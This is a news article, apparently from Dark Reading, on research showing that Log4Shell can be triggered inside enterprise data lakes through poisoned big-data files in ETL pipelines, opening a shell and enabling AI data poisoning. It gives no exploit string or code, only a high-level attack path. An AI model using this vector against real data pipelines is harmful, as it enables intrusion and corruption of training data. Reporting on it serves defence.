Log4Shell exploit threatens enterprise data lakes, AI poisoning
Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
Generally, organizations are focused on ingesting as many data points for training an AI or algorithm that they can, with an eye toward privacy — but all too often, they’re skipping over hardening the security of the data lakes themselves.
According to research from Zectonal, the Log4Shell bug can be triggered once it is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.
“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms.”
Leveraging RCE Exploits to Access Data Lakes
One of the ways to accomplish this attack is by targeting vulnerable versions of the no-code, open source extract-transform-load (ETL) software application — one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.
While ETL patched the RCE issue last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period,” according to the report, shared with Dark Reading prior to publication.
“This attack vector isn’t as simple as just kind of sending a text string to a Web server,” Hirko says, noting the need to penetrate the data supply chain. “An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string.”
To read the complete article, visit Dark Reading.